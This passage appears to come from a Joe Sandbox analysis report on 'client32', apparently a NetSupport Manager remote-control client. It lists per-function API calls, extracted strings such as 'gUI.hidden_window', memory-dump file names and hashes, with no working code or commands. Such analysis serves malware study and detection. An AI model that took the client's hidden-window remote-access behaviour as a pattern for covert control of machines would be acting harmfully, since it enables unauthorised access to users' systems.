V12.10F20, xrefs: 110470FA, 110471A5

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$DirectoryErrorExitFileLastMessageModuleNameProcessWindows_calloc_free_strrchr
String ID: %s %s$CLTCONN.CPP$NSA %s$NSS$V1.10$V12.00$V12.10$V12.10F20
API String ID: 1757445300-1785190265
Opcode ID: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
Instruction ID: 26d4bceacdf9fffedd66530a5670ce95754bb6fc5caa385817b5218b2f2053ae
Opcode Fuzzy Hash: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
Instruction Fuzzy Hash: 3F619A78E00657ABD714CFB48CC1B6FF7E99F40308F1048A8ED5697641EA62F904C3A2

Function 11121300 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4E4
Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4F1
Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F516

_free.LIBCMT ref: 1112131D

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

_free.LIBCMT ref: 11121333
_free.LIBCMT ref: 11121348
GdiFlush.GDI32(?,?,?,02AE8EB8), ref: 11121350
_free.LIBCMT ref: 1112135D
_free.LIBCMT ref: 11121371
SelectObject.GDI32(?,?), ref: 1112138D
DeleteObject.GDI32(?), ref: 1112139A
GetLastError.KERNEL32(?,?,?,?,?,02AE8EB8), ref: 111213A4
DeleteDC.GDI32(?), ref: 111213CB
ReleaseDC.USER32(?,?), ref: 111213DE
DeleteDC.GDI32(?), ref: 111213EB
InterlockedDecrement.KERNEL32(111EA9C8), ref: 111213F8

Strings

Error deleting membm, e=%d, xrefs: 111213AB

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
String ID: Error deleting membm, e=%d
API String ID: 3195047866-709490903
Opcode ID: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
Instruction ID: f7d3d32e9876efa9dbc162a5d98189d6a342c9de11ba00d9e1d1e6b63679a2c9
Opcode Fuzzy Hash: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
Instruction Fuzzy Hash: 892144B96107019BD214DFB5D9C8A9BF7E8FF98319F10491CE9AE83204EB35B501CB65

Function 110CF130 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 239COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000017DD), ref: 110CF18A
ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
GetWindowRect.USER32(00000000,?), ref: 110CF1DD
GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
GetWindowLongA.USER32(00000000,000000F0), ref: 110CF2FC
GetClientRect.USER32(00000000,?), ref: 110CF3C3
CreateWindowExA.USER32(00000000,Static,11195264,5000000E,?,?,00000010,00000010,?,00003A97,00000000,00000000), ref: 110CF400

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110CF1C0, 110CF254, 110CF2E4, 110CF3A6
m_eh, xrefs: 110CF2B5
m_hWnd, xrefs: 110CF1C5, 110CF259, 110CF2E9, 110CF3AB
Static, xrefs: 110CF3F9
..\ctl32\nsmdlg.cpp, xrefs: 110CF2B0

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Rect$ClientCreateItemLongObjectShowText
String ID: ..\ctl32\nsmdlg.cpp$Static$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
API String ID: 4172769820-2231854162
Opcode ID: 9029ec4f1e5ab3260b884abce1032d57b8f7010436834d86196a7f52dafc7713
Instruction ID: 2d84ac58a4c57407e54c3cb5711102d4444eebaf719169cc73b89b5b27c55d8a
Opcode Fuzzy Hash: 9029ec4f1e5ab3260b884abce1032d57b8f7010436834d86196a7f52dafc7713
Instruction Fuzzy Hash: 8F81C375E00716ABD721CF64CC85F9EB3F4BB88B08F0045ADE5569B680EB74A940CF92

Function 1110F3F0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 218fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0000017D,0BAD89F8,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
_memset.LIBCMT ref: 1110F4C2
SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE

Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1118B168,000000FF), ref: 1110F5F5
_free.LIBCMT ref: 1110F628
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F665
timeEndPeriod.WINMM(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F677
LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,0BAD89F8,0000017D,00000001), ref: 1110F681

Strings

End Record %s, xrefs: 1110F442
PCIR, xrefs: 1110F5C9, 1110F5CC

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
String ID: End Record %s$PCIR
API String ID: 4278564793-2672865668
Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91

Function 110F70E0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 176libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wtsapi32.dll,0BAD89F8,1102E747,?,00000000), ref: 110F711B
GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
wsprintfA.USER32 ref: 110F7235
SetLastError.KERNEL32(00000078), ref: 110F7242
wsprintfA.USER32 ref: 110F7267
GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F72A7
SetLastError.KERNEL32(00000078), ref: 110F72BC
FreeLibrary.KERNEL32(?), ref: 110F72D0

Strings

WTSFreeMemory, xrefs: 110F72A1
%u.%u.%u.%u, xrefs: 110F7261
WTSQuerySessionInformationA, xrefs: 110F716F
%x:%x:%x:%x:%x:%x:%x:%x, xrefs: 110F722F
Wtsapi32.dll, xrefs: 110F7113

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastLibraryProcwsprintf$FreeLoad
String ID: %u.%u.%u.%u$%x:%x:%x:%x:%x:%x:%x:%x$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
API String ID: 856016564-3838485836
Opcode ID: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
Instruction ID: 25a542e7ca9f20ccb9d734b321771151ba7e8120a74b68384c663ef2db5eebf1
Opcode Fuzzy Hash: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
Instruction Fuzzy Hash: 2161B771D042689FDB18CFA98C98AADFFF5BF49301F0581AEF16A97251D6345904CF20

Function 11025000 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
GetDC.USER32(?), ref: 11025085
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
SelectObject.GDI32(?,00000000), ref: 110250A2
GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
SelectObject.GDI32(?,?), ref: 110250C7
ReleaseDC.USER32(?,?), ref: 110250CF
SetCaretPos.USER32(?,?), ref: 11025111

Strings

, xrefs: 1102502F

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
String ID:
API String ID: 4100900918-3916222277
Opcode ID: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
Instruction ID: b0707e50622e5a2dee3f64ca7938c426cfa52823b6f102614556d1b444951bd6
Opcode Fuzzy Hash: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
Instruction Fuzzy Hash: 84414C71A41318AFEB10DFA4CD84FAEBBF8EF89700F118169F915AB244DB749900CB60

Function 1101F0D0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 116windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101F0FE
SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1101F11D

Part of subcall function 110CCE60: GetWindowRect.USER32(110CEFF5,?), ref: 110CCE7C

Part of subcall function 110CCE60: SetRectEmpty.USER32(?), ref: 110CCE88

DeleteObject.GDI32(00000000), ref: 1101F16C
DeleteObject.GDI32(00000000), ref: 1101F178
CreateFontIndirectA.GDI32(?), ref: 1101F187
CreateFontIndirectA.GDI32(?), ref: 1101F19F
GetMenuItemCount.USER32 ref: 1101F1A7
_memset.LIBCMT ref: 1101F1CF
GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F20C
__strdup.LIBCMT ref: 1101F221
SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1101F279

Strings

MakeOwnerDraw, xrefs: 1101F0E4
0, xrefs: 1101F1E8

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InfoItemMenu$CreateDeleteFontIndirectObjectRect_memset$CountEmptyParametersSystemWindow__strdup
String ID: 0$MakeOwnerDraw
API String ID: 1249465458-1190305232
Opcode ID: 8c9bd2224f42fac49adbc09d6f8f2acc0ae91da077bc4100c348b21e51c723fb
Instruction ID: cad075490b8b101532292c9a84c7126ab9bfd0db94d612dc2b0baac2de7b47d0
Opcode Fuzzy Hash: 8c9bd2224f42fac49adbc09d6f8f2acc0ae91da077bc4100c348b21e51c723fb
Instruction Fuzzy Hash: 19417E71D012399BDB64DFA4CC89BD9FBB8BB09708F0001D9E508A7284DBB46A84CF94

Function 11131320 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 187COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,11139C95,00000000), ref: 11131428
ShowWindow.USER32(00000000,00000000,?,11139C95,00000000), ref: 11131457

Strings

#32770, xrefs: 111313CC, 11131416
Hidden, xrefs: 111313C7, 11131411
Client, xrefs: 11131472
UI.CPP, xrefs: 1113143C
StatusMode, xrefs: 1113146D
gUI.hidden_window, xrefs: 11131441

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLastShowWindow
String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
API String ID: 3252650109-4091810678
Opcode ID: 3934f158285cda88db21c3109430663c83d793430f4a9331a1973ddc11de89e1
Instruction ID: 1b40a51cdbaebc86ba70b46d463032212dc909346aab7ab50ce078dfded898e8
Opcode Fuzzy Hash: 3934f158285cda88db21c3109430663c83d793430f4a9331a1973ddc11de89e1
Instruction Fuzzy Hash: 2161D571B84325ABE711CF90CC85F69F774E784B29F104129F625AB2C4EBB56940CB84

Function 110F7300 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 137libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wtsapi32.dll,0BAD89F8,1102E747,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110F732D
GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7372
GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73C3
SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F73D8
GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73FD
SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7412
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7440
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7451

Strings

WTSFreeMemory, xrefs: 110F73BD, 110F73F7
WTSQuerySessionInformationA, xrefs: 110F7368
Wtsapi32.dll, xrefs: 110F7328

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastLibraryProc$Free$Load
String ID: WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
API String ID: 2188719708-2019804778
Opcode ID: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
Instruction ID: 4e6ae02227e90de241cbe6e1e3770e4d50810e342ffe13a4e1f679076b39a632
Opcode Fuzzy Hash: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
Instruction Fuzzy Hash: 49511371D4121AEFDB14DFD9D9C5AAEFBF5FB48300F51846AE829E3600DB34A9018B61

Function 1100D330 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1100D3A1

Strings

RequiresVista, xrefs: 1100D349
StillInstances, xrefs: 1100D38F
BadParam, xrefs: 1100D381
NoCapClients, xrefs: 1100D373
NotFound, xrefs: 1100D37A
CannotGetFunc, xrefs: 1100D35E
AlreadyStopped, xrefs: 1100D36C
DllInitFailed, xrefs: 1100D357
Unknown error %d, xrefs: 1100D397
Exception, xrefs: 1100D388, 1100D396
AlreadyStarted, xrefs: 1100D365
CannotLoadDll, xrefs: 1100D350

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
API String ID: 2111968516-2092292787
Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
